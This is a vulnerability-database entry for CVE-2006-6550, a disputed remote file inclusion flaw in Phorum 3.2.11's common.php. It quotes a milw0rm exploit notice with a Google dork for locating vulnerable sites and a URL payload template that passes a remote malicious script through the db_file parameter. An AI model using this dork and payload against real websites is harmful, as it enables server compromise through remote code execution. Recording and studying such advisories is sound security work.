https://www.exploit-db.com/exploits/2894
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-316
Phorum 'common.php' PHP Remote File Inclusion Vulnerability






Vulnerability ID | 1111726 | Vulnerability type | Unknown |
Published | 2006-12-06 | Updated | 2006-12-14 |
CVE ID | CVE-2006-6550 | CNNVD ID | CNNVD-200612-316 |
Platform | PHP | CVSS score | 7.5 |
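|Vulnerability source
|Vulnerability details
**Disputed** A PHP remote file inclusion vulnerability exists in common.php in Phorum 3.2.11 and earlier. Remote attackers can execute arbitrary PHP code via a URL in the db_file parameter. Note: CVE disputes this vulnerability, because db_file is defined before it is used.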
|Exploit
===========================================================
Yee7TeaM
WwW.Yee7.CoM
===========================================================
Software: Phorum v3.2.11
Vendor: http://www.phorum.org/
Download: http://skrypty.webpc.pl/pobierz274.html
Dork: "Copyright (C) 2000 Phorum Development Team" and back form doc
folder :)
Description:
Line 31 of common.php
>
>> // $db_file = './db/postgresql65.php';
>
Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]
===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================
# milw0rm.com [2006-12-06]
|References
Source: XF
Name: phorum-dbfile-file-include(30741)
Link: http://xforce.iss.net/xforce/xfdb/30741
Source: MILW0RM
Name: 2894
Link: http://www.milw0rm.com/exploits/2894
Source: MILW0RM
Name: 2894
Link: http://milw0rm.com/exploits/2894